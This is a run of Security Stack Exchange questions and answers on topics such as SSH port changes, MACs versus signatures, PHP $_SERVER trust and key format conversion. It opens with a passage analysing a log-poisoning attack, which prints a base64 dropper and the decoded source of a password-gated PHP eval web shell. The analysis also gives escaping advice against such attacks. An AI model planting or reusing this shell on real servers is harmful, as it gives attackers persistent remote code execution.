JaWYgKGZpbGVfZXhpc3RzKCJ7JGRpcn0yZTAzMGJhMzQ4ZWI0Nzg3N2I5OTQ5MzRkNDIwYzQ3NS5waHAiKSkNCgl7DQogICAgICAgICRjayA9ICIxODIzNjQ5MzY1ODIwMzU0IjsNCgkgICAgcHJpbnQgIiRjazp7Kn06JGRpcjp7Kn06IjsNCgkJZXhpdDsNCgl9DQp9\")); ?>"
As Thomas pointed out, this attack is designed to exploit poor content handling in log utilities. There are many "log to HTML" engines that simply extract the text of the logs and place them blindly into a HTML template. When the user requests the HTML page from the server, the <?php tags are parsed by the PHP engine and the code is executed. Since many servers allow .html files to be handled by PHP, this has a reasonable chance of working. Let's take a look at the payload. The block of base64 that you see in that attack string decodes to the following PHP script: @ini_set('allow_url_fopen', 1); addLoader(); $data = @opendir('.'); while ($file = @readdir($data)) { $file = trim($file); if (!$file || preg_match('/^\.+$/', $file) || !is_dir($file)) continue; addLoader($file); } @closedir($data); function addLoader($dir = '') { if ($dir) $dir .= '/'; @chmod($dir, 777); @system("chmod 777 $dir"); $fp = fopen("{$dir}2e030ba348eb47877b994934d420c475.php", "w"); fwrite($fp, base64_decode('PD9waHANCg0KQGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOw0KQGluaV9zZXQoJ2RlZmF1bHRfc29ja2V0X3RpbWVvdXQnLCA2MCk7DQpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgNjApOw0KQHNldF90aW1lX2xpbWl0KDYwKTsNCg0KJGRhdGEgPSBAdW5zZXJpYWxpemUoYmFzZTY0X2RlY29kZSh0cmltKEAkX1BPU1RbJ2RhdGEnXSkpKTsNCg0KaWYgKEAhaXNfYXJyYXkoJGRhdGEpIHx8IG1kNSgkZGF0YVsncGFzc3dvcmQnXSkgIT0gJ2QzZGY0MzljM2U0YjJjNDE5MjBkOGUyNzMzMTEzMjM2JykgZXhpdDsNCmlmIChAJGRhdGFbJ2NvZGUnXSkgZXZhbChiYXNlNjRfZGVjb2RlKCRkYXRhWydjb2RlJ10pKTsNCmlmIChAJGRhdGFbJ2NoZWNrX2NvZGUnXSkgcHJpbnQgJGRhdGFbJ2NoZWNrX2NvZGUnXTsNCg0KPz4=')); fclose($fp); if (file_exists("{$dir}2e030ba348eb47877b994934d420c475.php")) { $ck = "1823649365820354"; print "$ck:{*}:$dir:{*}:"; exit; } } Let's dissect this a bit... The @ini_set line enables URL handlers in fopen calls, so external resources can be fetched. The @ prefix suppresses any errors that might occur if the call fails. The call to addLoader() does the main bulk of the work. I'll go into this in a moment. @opendir('.') obtains a handle to the current directory. The while loop runs through every sub-directory in the directory, and calls addLoader($file) for each. It uses a regex to skip the . and .. entries. Don't be fooled by the variable name - this does not loop through files. Finally it calls @closedir($data) . Nice of it to clean up! But what does addLoader do? Essentially it attempts to chmod 777 every directory it can find, then dumps a PHP file called 2e030ba348eb47877b994934d420c475.php into them, with some contents taken from a base64 string. The final block of code seems to be some kind of mechanism to let the attacker identify which paths were successfully written to, perhaps using a magic number for automation. Side note: I can't find any reference to the file name hash online or in any hash database I know of. Let's dissect that base64: <?php @ini_set('allow_url_fopen', 1); @ini_set('default_socket_timeout', 60); @ini_set('max_execution_time', 60); @set_time_limit(60); $data = @unserialize(base64_decode(trim(@$_POST['data']))); if (@!is_array($data) || md5($data['password']) != 'd3df439c3e4b2c41920d8e2733113236') exit; if (@$data['code']) eval(base64_decode($data['code'])); if (@$data['check_code']) print $data['check_code']; ?> This is simple enough. The first few calls try to set up a permissive environment, where external resources can be loaded and scripts can run for up to 60 seconds. It takes a POST parameter called data and deserialises it into an array, and checks that the password matches a hard-coded MD5 hash. 
I tried looking up this hash in a few databases, but couldn't find a corresponding plaintext. If the password is correct, it then goes on to check for a code parameter, which it then executes. It also has a check_code option, which is presumably for verifying that the code arrived properly after transport encoding and decoding was performed. So, all in all, this is a pretty bog-standard PHP shell with a delivery payload that tries to ensure maximum coverage in case of any writeable sub-directory.
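For the "log to HTML" engines this payload targets, the defence is mundane: treat log fields such as the User-Agent as untrusted text, escape them before they reach an HTML page, and make sure the generated report is never handed to the PHP interpreter. A minimal sketch (the log file name is a placeholder):

<?php
// render raw access-log lines as inert text, so that an embedded "<?php" open tag
// in a User-Agent is displayed instead of ever being parsed
foreach (file('access.log') as $line) {
    echo '<pre>' . htmlspecialchars($line, ENT_QUOTES, 'UTF-8') . '</pre>';
}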
{ "source": [ "https://security.stackexchange.com/questions/31916", "https://security.stackexchange.com", "https://security.stackexchange.com/users/21451/" ] }
32,003
Upon reviewing the Logs generated by different SIEMs (Splunk, HP Logger Trial and the AlienVault platform’s SIEM) I noticed that for some reason quite a few users tend to make the mistake of typing their passwords in the username field, either in the OS Domain logon, or within web applications. I am guessing those are people who cannot type without looking at the keyboard and in trying to do so, doing it fast, end up typing their passwords in the wrong field. This means that the password is sent in plain text everywhere in the network and end up recorded on the logs with an event that says something along the lines: User P@$$w0rd does not exist [...] Or An account failed to login: P@$$w0rd [...] (where P@$$w0rd is the actual user's password) It becomes pretty obvious to work out to whom the passwords belong: usually the previous or very next (un)successful event on the same log file will tell you an event triggered by the same user. Any other Analyst, looking at the logs, could get someone else’s credentials without the due owner even being aware of that; the worst case scenario is network eavesdropping, or actual log file compromise. I am looking for a general guidance to help preventing this. I assume simply masking the username is not feasible and even if it were, this would probably eliminate a lot of the log analysis for not being able to tell who did what. Note: There is already a post on a similar issue, but I am trying to address a way to prevent it. What's the risk if I accidently type my password into a username field (Windows logon)? Accepted Answer: I wish I could select a few answers from the list. Unfortunately I have to stick to just one in the forum, but in practice I can combine them. Thanks very much for all the answers; I see there is no single solution. As I agree that adding 'things' add complexity which increase likelihood of security holes, I have to agree with most of the voters that @AJHenderson has the most elegant and simplest answer as a first approach. Definitely SSL and a simple code verification on the server or even at the client side. As I am looking to mitigate not against malicious users, but the distracted ones, this will do fine. Once this is in place, we can start looking at expanding the implementation to ill-intended users if appropriate. Thanks ever so much again for everyone's input.
One thought is to not allow form submission if there is no value in the password box. Generally, if they accidentally entered the password in the username field, then there isn't likely to be anything in the password field. It is worth noting that this does not have to be done only client-side; it could also be done on the server, as long as the transport used is secure and the input is not logged until after it has passed the check that the password field is not empty.
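A minimal server-side sketch of that check in PHP (field names are placeholders; the point is that the rejection happens before anything is logged or passed on):

<?php
$username = isset($_POST['username']) ? $_POST['username'] : '';
$password = isset($_POST['password']) ? $_POST['password'] : '';

if ($password === '') {
    // likely the password ended up in the username box - do not log $username
    http_response_code(400);
    exit('Please fill in both the username and the password fields.');
}
// only now hand $username over to authentication and audit logging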
{ "source": [ "https://security.stackexchange.com/questions/32003", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20008/" ] }
32,064
So, I keep finding the conventional wisdom that 'security through obscurity is no security at all', but I'm having the (perhaps stupid) problem of being unable to tell exactly when something is 'good security' and when something is just 'obscure'. I checked other questions relating tangentially to this, and was unable to figure out the precise difference. For example: Someone said using SSH on a nonstandard port counts as security through obscurity. You're just counting on the other person to not check for that. However, all SSH is doing is obscuring information. It relies on the hope that an attacker won't think to guess the correct cryptographic key. Now, I know the first circumstance (that someone would think to check nonstandard ports for a particular service) is far more likely than the second (that someone would randomly guess a cryptographic key), but is likelihood really the entire difference? And, if so, how am I (an infosec n00b, if that isn't already abundantly clear) supposed to be able to tell the good (i.e. what's worth implementing) from the bad (what isn't)? Obviously, encryption schemes which have been proven to be vulnerable shouldn't be used, so sometimes it's more clear than others, but what I'm struggling with is how I know where the conventional wisdom does and doesn't apply. Because, at first blush, it's perfectly clear, but when I actually try to extrapolate a hard-and-fast, consistently applicable algorithm for vetting ideas, I run into problems.
The misconception you're having is that security through obscurity is bad. It's actually not; security only through obscurity is terrible. Put it this way: you want your system to be completely secure even if someone knew the full workings of it, apart from the key secret component that you control. Cryptography is a perfect example of this. If you are relying on the attacker 'not seeing your algorithm' by using something like a ROT13 cipher, it's terrible. On the flip side, if they can see exactly the algorithm used yet still cannot practically do anything, we have the ideal security situation. The thing to realize is that you never want to count on obscurity, but it certainly never hurts. Should I password-protect / use keys for my SSH connection? Absolutely. Should I rely on changing the server from port 22 to port 2222 to keep my connection safe? Absolutely not. Is it bad to change my SSH server to port 2222 while also using a password? No; if anything this is the best solution. Changing ("obscuring") the port will simply cut down on a heap of automatic exploit scanners searching normal ports. We gain a security advantage through obscurity, which is good, but we are not counting on the obscurity: if they find the port they still need to crack the password. TL;DR - Only counting on obscurity is bad. You want your system to be secure with the attacker knowing its complete workings apart from specifically controllable secret information (i.e. passwords). Obscurity in itself, however, isn't bad, and can actually be a good thing. Edit: To more precisely answer your probability question, yes, in a way you could look at it like that, yet do so appreciating the differences. Ports range from 1-65535 and can all be checked within a minute with a scanner like nmap. "Guessing" a random, say, 10-character password drawn from all ASCII characters is a 1 in 1.8446744e+19 chance and would take 5.8 million years at 100,000 guesses a second. Edit 2: To address the comment below: keys can be generated with sufficient entropy to be considered truly random ( https://www.rfc-editor.org/rfc/rfc4086 ); if not, it's a flaw in the implementation rather than in the philosophy. You're correct in saying that everything relies on attackers not knowing information (passwords), and the dictionary definition of obscurity is "the state of being unknown", so you can correctly say that everything is counting on a level of obscurity. Once more, though, the worth comes down to the practical security given that the information you're able to control remains unknown. Keys, be they passwords or certificates etc., are (relatively) simple to keep secret. Algorithms and other easy-to-check methods are hard to keep secret. "Is it worthwhile" comes down to determining what it is possible to keep unknown, and judging the possibility of compromise based on that unknown information.
{ "source": [ "https://security.stackexchange.com/questions/32064", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20350/" ] }
32,089
I'm starting to study for Security+ using Darril Gibson's book. I took the pre-exam and one of the questions is “What is the most important security benefit of a clean desk policy?” The choices are: Prevent illnesses due to viruses and bacteria Presents a positive image to customers Ensures sensitive data and passwords are secured Increases integrity of data The bold answer is correct, and the author's explanation is: A clean desk policy requires users to organize their areas to reduce the risk of possible data theft and password compromise. Can someone explain what an organized desk has to do with security? I think this question only applies if the user stores his password in paper format.
Clean desk policies are rather literal, in the sense that they don't mean the papers on your desk need to be organized... they mean that you're not allowed to have papers on your desk at all. So, no papers left unlocked on a desk means no papers with sensitive information for others to trawl through after hours. Sensitive data doesn't only include passwords. Engineering designs, sensitive communications, financial information... there is lots of data that could be on paper that a company wouldn't want left around for just anyone to find.
{ "source": [ "https://security.stackexchange.com/questions/32089", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15194/" ] }
32,114
I understand that a MAC algorithm takes a message and a private key as input and hashes them to a value. I understand that senders and receivers often use MACs to authenticate a message and check the integrity of a message. If a sender/receiver successfully computes the same mac, then (1) the receiver has assurance that the sender has the secret key (2) the receiver has assurance that the message was not tampered with in sending (because otherwise it would generate a new mac value). I also understand that digital signatures are somehow different from MACs. But it seems like both verify the sender and authenticity of the message. If you have a successful MAC scheme set up you know that the message (1) is coming from a person with the key (handling authentication) and (2) has not been tampered with (handling tampering). So what do digital signatures do that MACs don't? What's the difference?
In both MAC and digital signature schemes, you have two algorithms: Generation: given the message m and a key K1, compute the MAC value or signature s. Verification: given the message m, a key K2 and the MAC value or signature s, verify that they correspond to each other (that the MAC value or signature is valid for the message m, using verification key K2). With a MAC, keys K1 and K2 are identical (or can be trivially recomputed from each other). With a signature, the verification key K2 is mathematically linked with K1 but not identical to it, and it is infeasible to recompute K1 from K2 or to generate valid signatures when you only know K2. Thus, signatures dissociate the generation and verification powers. With a MAC, any entity who can verify a MAC value necessarily has the power to generate MAC values of its own. With signatures, you can make the verification key public, while keeping the generation key private. Signatures are for when you want to produce a proof verifiable by third parties, without having to entrust those third parties with anything. Application: a CA (like Verisign or Thawte or whatever) issues a certificate to an SSL server. Everybody, and in particular your Web browser, can verify that the certificate issued to the SSL server has indeed been signed by Verisign/Thawte/whatever. But this does not give you the power to issue (sign) certificates yourself, which would appear as if they were issued by Verisign/Thawte/whatever.
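A small PHP sketch of that difference (key material and message are placeholders; hash_equals() needs PHP 5.6 or later). It only shows that the HMAC verifier needs the same secret, while the signature verifier needs nothing but the public key:

<?php
$msg = 'example message';

// MAC: one shared secret key both generates and verifies the tag
$key = 'shared-secret-key';
$tag = hash_hmac('sha256', $msg, $key);
$macOk = hash_equals($tag, hash_hmac('sha256', $msg, $key)); // verifier must know $key

// Signature: generate with the private key, verify with the public key only
$priv = openssl_pkey_new(array('private_key_bits' => 2048,
                               'private_key_type' => OPENSSL_KEYTYPE_RSA));
openssl_sign($msg, $sig, $priv, OPENSSL_ALGO_SHA256);
$details = openssl_pkey_get_details($priv);
$sigOk   = (openssl_verify($msg, $sig, $details['key'], OPENSSL_ALGO_SHA256) === 1);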
{ "source": [ "https://security.stackexchange.com/questions/32114", "https://security.stackexchange.com", "https://security.stackexchange.com/users/9499/" ] }
32,123
I'm just about to switch to a new SSD drive, so I figured it's a good occasion for a really, really fresh start. I reconsidered every installed piece of software, uninstalled lots of crap (surprisingly, my system started to be more responsive ;]), and checked for viruses and stuff (since I didn't want to transfer any malware to my brand new shiny system). During the virus scan, one file popped as suspected, and then I started to wonder... Though I haven't any direct proof that I ever encountered a serious infection, like really weird acts of rebooting/bsods/problems with apps, and I took lots of precautions (always kept my software updated, used firefox's "noscript" extension, kept java turned off, used sandboxes, AV, and so on), maybe something slipped. And if something slipped - all is compromised. All hope is gone... ;] I started to wonder about the current state of malware. Is it capable of spreading on connected USB drives (in that case, all my backups are compromised); spreading through the local network (in which case all my other PCs are compromised too); infecting my restore partition (yay! this is getting scary); infecting my BIOS/UEFI (just enough so it could redownload it's full package and start spreading again)... Are malware authors capable of making viruses such as these? That is, viruses that can spread through all possible devices in such a way to always remain hidden from users and spread unchallenged. Eventually, every machine would be infected; even fresh new ones, machines currently in the factory would be infected, and so on, and so on... Maybe it's already happened. Are our computers living in their own "virus matrix?" The Vitrix? ;] Ok, jokes aside. It's probably impossible to create such software, so let's go back to my original, simpler question, involving only one infected machine: Could any machine, once infected, ever be trusted again?
Theoretically, no, an infected machine cannot be trusted anymore. In practice, wiping the hard disk (or just removing it and inserting a new one) is often sufficient, although some viruses have been known to reflash part of the BIOS, either for pure wanton devastation or to make the virus resistant to disk formatting. Some motherboards will not allow reflashing unless a specific jumper is physically plugged in, which at least protects against hostile reflashing; if unsure, consult the documentation of your motherboard (if you use a laptop, you are probably out of luck). Apart from the BIOS, other devices can have flashable firmware; a demonstration has been made in the case of some Apple keyboards. While all of this means that a once-corrupted machine can never be really trusted again, it raises the sister question: how come you could trust the machine in the first place? You don't really know where it has been (at least not with more precision than "some factory in south China"). A possible answer is that if the attacker managed to plant some malware which resisted a complete machine reinstall, then he probably deserves to stay there. At least, this piece of malware has been written by someone who is technically competent, which is refreshing. It would be a great day if you could say the same of the majority of the other software you run on your machine.
{ "source": [ "https://security.stackexchange.com/questions/32123", "https://security.stackexchange.com", "https://security.stackexchange.com/users/21573/" ] }
32,299
Can I 100% rely on $_SERVER[] to be a safe source of data that I do not need to sanitize, like I do with $_GET[] and $_POST[]?
This is taken from one of my questions on Stack Overflow: Which $_SERVER variables are safe? Server controlled These variables are set by the server environment and depend entirely on the server configuration. 'GATEWAY_INTERFACE' 'SERVER_ADDR' 'SERVER_SOFTWARE' 'DOCUMENT_ROOT' 'SERVER_ADMIN' 'SERVER_SIGNATURE' Partly server controlled These variables depend on the specific request the client sent, but can only take a limited number of valid values, since all invalid values should be rejected by the web server and not cause the invocation of the script to begin with. Hence they can be considered reliable . 'HTTPS' 'REQUEST_TIME' 'REMOTE_ADDR' * 'REMOTE_HOST' * 'REMOTE_PORT' * 'SERVER_PROTOCOL' 'HTTP_HOST' † 'SERVER_NAME' † 'SCRIPT_FILENAME' 'SERVER_PORT' 'SCRIPT_NAME' * The REMOTE_ values are guaranteed to be the valid address of the client, as verified by a TCP/IP handshake. This is the address where any response will be sent to. REMOTE_HOST relies on reverse DNS lookups though and may hence be spoofed by DNS attacks against your server (in which case you have bigger problems anyway). This value may be a proxy, which is a simple reality of the TCP/IP protocol and nothing you can do anything about. † If your web server responds to any request regardless of HOST header, this should be considered unsafe as well. See How safe is $_SERVER[“HTTP_HOST”]? . Also see http://shiflett.org/blog/2006/mar/server-name-versus-http-host . Entirely arbitrary user controlled values These values are not checked at all and do not depend on any server configuration, they are entirely arbitrary information sent by the client. 'argv' , 'argc' (only applicable to CLI invocation, not usually a concern for web servers) 'REQUEST_METHOD' ‡ 'QUERY_STRING' 'HTTP_ACCEPT' 'HTTP_ACCEPT_CHARSET' 'HTTP_ACCEPT_ENCODING' 'HTTP_ACCEPT_LANGUAGE' 'HTTP_CONNECTION' 'HTTP_REFERER' 'HTTP_USER_AGENT' 'AUTH_TYPE' § 'PHP_AUTH_DIGEST' § 'PHP_AUTH_USER' § 'PHP_AUTH_PW' § 'PATH_INFO' 'ORIG_PATH_INFO' 'REQUEST_URI' (may contain tainted data) 'PHP_SELF' (may contain tainted data i.e. /index.php/evilstring) 'PATH_TRANSLATED' any other 'HTTP_' value ‡ May be considered reliable as long as the web server allows only certain request methods. § May be considered reliable if authentication is handled entirely by the web server. The superglobal $_SERVER also includes several environment variables. Whether these are "safe" or not depend on how (and where) they are defined. They can range from completely server controlled to completely user controlled.
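As a small illustration of the HTTP_HOST caveat above, an application can refuse to build URLs from a host name it does not actually serve; the host names in this sketch are placeholders:

<?php
$allowedHosts = array('www.example.com', 'example.com');
$host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '';

if (!in_array($host, $allowedHosts, true)) {
    header('HTTP/1.1 400 Bad Request');
    exit;
}
// from here on, $host is known to be one of the names this site is served under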
{ "source": [ "https://security.stackexchange.com/questions/32299", "https://security.stackexchange.com", "https://security.stackexchange.com/users/21768/" ] }
32,308
Is there any advantage in changing the SSH port? I've seen people do that, but I can't seem to find the reason why. If you have a strong password and/or a certificate, is it useful for anything? Edit: I should also mention that I am using iptables rules to limit brute-force attacks; only 5 login attempts are allowed per minute per IP address.
The Internet is a wild and scary place, full of malcontents whose motives range from curiosity all the way to criminal enterprise. These unsavories are constantly scanning for computers running services they hope to exploit, usually the more common services such as SSH, HTTP, FTP, etc. The scans typically fall into one of two categories: recon scans to see which IP addresses have those services open, and exploit scans against IP addresses that have been found to be running a specific service. Considering how large the Internet is, it is typically infeasible to look on every port of every IP address to find what's listening everywhere. This is the crux of the advice to change your default port. If these disaffected individuals want to find SSH servers they will start probing each IP address on port 22 (they may also add some common alternates such as 222 or 2222). Then, once they have their list of IP addresses with port 22 open, they will start their password brute force to guess usernames/passwords, or launch their exploit kit of choice and start testing known (at least to them) vulnerabilities on the target system. This means that if you change your SSH port to 34887 then that sweep will pass you by, likely resulting in you not being targeted by the follow-up break-in. Seems rosy, right? There are some disadvantages though. Client support: everybody who connects to your server will need to know and use the changed port. If you are in a heavily managed environment, this configuration can be pushed down to the clients, or if you have few enough users it should be easy to communicate. Documentation exceptions: most network devices, such as firewalls and IDSes, come pre-configured for common services running on common ports. Any firewall rules related to this service on those devices will need to be inspected and possibly modified. Similarly, IDS signatures are tuned to only perform SSH inspection on port 22, so you will need to modify every signature, every time it is updated, to use your new port. (As a data point, there are currently 136 VRT and ET Snort signatures involving SSH.) System protections: modern Linuxes often ship with kernel-layer MAC and/or RBAC systems (e.g. SELinux on Red Hat-based or AppArmor on Debian-based distributions) that are designed to only allow applications to do exactly what they're intended to do. That could range from accessing the /etc/hosts file, to writing to a specific file, to sending a packet out on the network. Depending on how this system is configured it may, by default, forbid sshd from binding to a non-standard port, and you would need to maintain a local policy that allows it (see the sketch below). Other-party monitoring: if you have an external information security division, or outsource monitoring, then they will need to be made aware of the change. When performing a security assessment, or analyzing logs looking for security threats, if I see an SSH server running on a non-standard port (or an SSH server on a non-UNIX/Linux host, for that matter) I treat it as a potential backdoor and invoke the compromised-system part of the incident handling procedure. Sometimes it is resolved in 5 minutes after a call to the administrator confirms it's legitimate, at which point I update documentation; other times it really is badness that gets taken care of. In any event, this can result in downtime for you or, at the least, a nerve-wracking call when you answer your phone and hear, "Hi, this is Bob from the Information Security Office. I have a few questions for you."
Before changing your port you need to take all of this into account so you know you're making the best decision. Some of those disadvantages may not apply, but some certainly will. Also consider what you're trying to protect yourself against. Oftentimes it is simply easier to just configure your firewall to only allow access to port 22 from specific hosts, as opposed to the whole Internet.
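A sketch of what the change looks like on a typical Linux server (the port number is just an example; the semanage step only applies to SELinux systems, and the iptables rules mirror the rate limit mentioned in the question):

# /etc/ssh/sshd_config
Port 2222

# on SELinux systems, allow sshd to bind the new port before restarting it
semanage port -a -t ssh_port_t -p tcp 2222

# carry the brute-force rate limit over to the new port
iptables -A INPUT -p tcp --dport 2222 -m state --state NEW -m recent --set --name SSH
iptables -A INPUT -p tcp --dport 2222 -m state --state NEW \
         -m recent --update --seconds 60 --hitcount 6 --name SSH -j DROP

service sshd restart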
{ "source": [ "https://security.stackexchange.com/questions/32308", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20038/" ] }
32,367
Is there any difference between the encrypted Google search (at https://encrypted.google.com ) and the ordinary HTTPS Google search (at https://google.com )? In terms of security, what are the benefits of browsing through encrypted Google search? Note that this is not a question about HTTP vs HTTPS. These are two Google services.
According to Google , the difference is with handling referrer information when clicking on an ad. After a note from AviD and with the help of Xander we conducted some tests and here are the results 1. Clicking on an ad: https://google.com : Google will take you to an HTTP redirection page where they'd append your search query to the referrer information. https://encrypted.google.com : If the advertiser uses HTTP, Google will not let the advertiser know about your query. If the advertiser uses HTTPS, they will receive the referrer information normally (including your search query). 2. Clicking on a normal search result: https://google.com : If the website uses HTTP, Google will take you to an HTTP redirection page and will not append your search query to the referrer information. They'll only tell the website that you're coming from Google. If it uses HTTPS, it will receive referrer information normally. https://encrypted.google.com : If the website you click in the results uses HTTP, it will have no idea where you're coming from or what your search query is. If it uses HTTPS, it will receive referrer information normally. The same topic was covered in an EFF blog post . EDIT : Google dropped encrypted.google.com as of April 30 2018. According to Google , this domain was used to give users a way to securely search the internet. Now, all Google products and most newer browsers, like Chrome, automatically use HTTPS connections.
{ "source": [ "https://security.stackexchange.com/questions/32367", "https://security.stackexchange.com", "https://security.stackexchange.com/users/11679/" ] }
32,433
Statement 1 There is a start up called PixelPin . On the web site it reads: The PixelPin solution is simple and quick to use, yet very secure. PixelPin eliminates the traditional alphanumeric password by using a picture based approach. The user chooses an image that’s personal to them (e.g. a photograph of their family or a memorable holiday photo). They then choose 4 points (Passpoints) in sequence on the image. The PixelPin process eliminates the risk of phishing, dictionary attacks and brute force hacking . There’s also a growing body of academic research suggesting that people remember Passpoints on a personal image more easily given the emotional connection evoked during the process. Statement 2 However, Cleopatra , a certificate manager for OpenPGP and X.509 (S/MIME) and common crypto dialogs, says that Photos give a false sense of security. Statement 1 seems to contradict Statement 2. Question: what is this noise about picture-based authentication. Is it secure to use or not?
The two statements speak of completely different things. They don't contradict each other. That does not make them both true, though. PixelPin: this product apparently replaces the password with the selection of four positions on a picture. This means that you choose a picture, and your "password" is the sequence of coordinates of four points you choose on the picture. Since users cannot be relied upon to always click on the exact same pixel, especially since they claim support for touch screens, one must assume that the pixel selection is somewhat fuzzy. If we suppose a full-screen picture on a smartphone, we can hope for, say, 200 possible selection points in the picture (it is as if the click from the user fell on a 20x10 grid). The implementation must do something smart to avoid threshold effects (when the user chooses a selection point which is close to the boundary between two grid elements). Four selection points then means 200^4 possible "passwords", i.e. an entropy of a bit more than 30 bits. While this is not bad, as far as passwords go, this is not exactly the most robust password ever. An important point to make is that human users are unlikely to choose "really random" points on the picture. As the example on the page shows, human users will click on the cat's nose, not on a random place on the back wall, if only to be able to click on it again at the next login attempt. I seriously doubt that in real conditions human users would achieve enough randomness in their selection to defeat brute force attacks. The PixelPin company claims that using a user-chosen picture makes it easier for users to remember their points; that I am ready to believe. They talk about the Picture Superiority Effect, a pompous name for the fact that humans are apes and apes are very visual animals: primates have had good vision for about 50 million years, while writing is human-only and no older than about 6000 years. It is no surprise that human memory groks pictures efficiently. Our ancestors were highly trained to remember what a lion looks like (let's say that the career of those who could not remember that was, on average, shorter). Overall, I find the claims of PixelPin a bit bold, quite possibly outrageous. The idea is interesting, though. The picture in certificates is something else. A certificate is about binding an identity with a public key. A picture could be thought of as part of the identity. The people at Kleopatra state that they don't want to support pictures for several reasons, among which is the idea that photos give a "false sense of security". What they mean is that a photo is a reasonable part of the identity of a person only insofar as the issuing CA checked that the photo was really that of the target person. This seems dubious, unless the issuing CA took the photo itself. Right now, with certificates as they are used today, photos in certificates are merely advertising; they are pictures of what the certificate holder would like to look like, and not pictures of the key owner as he really is. Briefly said, pictures in certificates tend to give users warm fuzzy feelings about some assumed enhanced security (by analogy with ID tags and passports, mostly), but these feelings are largely unsubstantiated. Kleopatra developers feel it is their duty to protect users against such things, hence the absence of support. (Or possibly they were just lazy and did not want to implement support for pictures.) This is completely different from what pictures are used for in PixelPin.
PixelPin is about pictures as a support for human memory. Kleopatra is talking about pictures as part of the physical identity.
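To put a rough number on the entropy estimate above (using the assumed 20x10 grid):

\log_2\bigl(200^4\bigr) = 4\,\log_2(200) \approx 4 \times 7.64 \approx 30.6 \text{ bits}

\log_2\bigl(62^8\bigr) = 8\,\log_2(62) \approx 47.6 \text{ bits (an 8-character random alphanumeric password, for comparison)}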
{ "source": [ "https://security.stackexchange.com/questions/32433", "https://security.stackexchange.com", "https://security.stackexchange.com/users/2553/" ] }
32,691
"Your password can't contain spaces." is a message I see from some websites, including 1 . Why? (This question is very similar to Why Disallow Special Characters In a Password? , but the answers there don't seem to apply to the space character). Some systems apparently strip out all spaces before hashing the password. ( How does Google not care about "spaces" in Application-specific passwords? ) Why not simply hash whatever the user typed in, spaces and all?
I can't explain it as anything beyond legacy madness, or lazily copying username restrictions to password restrictions without forethought. Any block of data, printable or otherwise, should be acceptable if you're hashing your passwords. The only restrictions should be a minimum complexity and a "sanity" maximum length so somebody doesn't soak up 1MB of bandwidth (and the corresponding CPU time to hash the input because you use a slow algorithm, right?) every time they login.
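In PHP (5.5 or later), for instance, the password can simply be treated as an opaque byte string, spaces and all:

<?php
$hash = password_hash('correct horse battery staple', PASSWORD_DEFAULT);
var_dump(password_verify('correct horse battery staple', $hash));  // bool(true)
var_dump(password_verify('correcthorsebatterystaple', $hash));     // bool(false)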
{ "source": [ "https://security.stackexchange.com/questions/32691", "https://security.stackexchange.com", "https://security.stackexchange.com/users/1571/" ] }
32,768
If I use the following openssl req -x509 -days 365 -newkey rsa:2048 -keyout private.pem -out public.pem -nodes I get private.pem and public.pem If I use ssh-keygen -t rsa -f rsa I get rsa and rsa.pub Is it possible to convert from the format of rsa to private.pem and vice-a-versa? Edit: To be more specific, a) If I have the private.pem and public.pem generated by the above command, how do I get the equivalent rsa private key and public key? b) Given the rsa and rsa.pub , how do I get the x509 keys if I do know the additional metadata that the above openssl command takes in? If I go from the openssh format to x509 and back, I should ideally get the same key file back.
You are missing a bit here. ssh-keygen can be used to convert public keys from SSH formats in to PEM formats suitable for OpenSSL. Private keys are normally already stored in a PEM format suitable for both. However, the OpenSSL command you show generates a self-signed certificate . This certificate is not something OpenSSH traditionally uses for anything - and it definitely is not the same thing as a public key only. OpenSSH does have support for certificates as well, but it is likely that you are not using this support. Also, these certificates are not X.509, so they are incompatible with OpenSSL. The certificate contains information that is not present anywhere else and each certificate is unique and can not be recreated at will. This means that you need to store the X.509 certificate, in addition to the private key, if you wish use the same key for both OpenSSL and OpenSSH. If you just want to share the private key, the OpenSSL key generated by your example command is stored in private.pem , and it should already be in PEM format compatible with (recent) OpenSSH. To extract an OpenSSH compatible public key from it, you can just run: ssh-keygen -f private.pem -y > private.pub If you want to start from OpenSSH and work your way over to the OpenSSL side, with a self-signed certificate (for whatever reason), here's how: $ ssh-keygen -f test-user Generating public/private rsa key pair. Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in test-user. Your public key has been saved in test-user.pub. The key fingerprint is: ff:36:f1:74:c7:0d:4e:da:79:5c:96:27:2c:2c:4e:b6 naked@tink The key's randomart image is: +--[ RSA 2048]----+ | | | | | . . .| | + o =.+| | S+ o * B+| | .E o = B| | . + o.| | .o . | | ... | +-----------------+ $ openssl req -x509 -days 365 -new -key test-user -out test-user-cert.pem You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]: State or Province Name (full name) [Some-State]: Locality Name (eg, city) []: Organization Name (eg, company) [Internet Widgits Pty Ltd]: Organizational Unit Name (eg, section) []: Common Name (e.g. server FQDN or YOUR name) []: Email Address []: $ ls -l test-user* -rw------- 1 naked naked 1675 Mar 18 21:52 test-user -rw-r--r-- 1 naked naked 1229 Mar 18 21:53 test-user-cert.pem -rw-r--r-- 1 naked naked 392 Mar 18 21:52 test-user.pub From these, both test-user and test-user-cert.pem files are critical to preserve, where as test-user.pub can always be recreated from test-user as needed.
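Two related conversions that often come up alongside the above (option support depends on your OpenSSL/OpenSSH versions):

# extract the PEM public key from the OpenSSL-generated private key
openssl rsa -in private.pem -pubout -out public-key.pem

# convert an OpenSSH public key to a PEM/PKCS#8 encoding (ssh-keygen versions with -m support)
ssh-keygen -e -m PKCS8 -f rsa.pub > rsa-pub.pem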
{ "source": [ "https://security.stackexchange.com/questions/32768", "https://security.stackexchange.com", "https://security.stackexchange.com/users/22142/" ] }
32,779
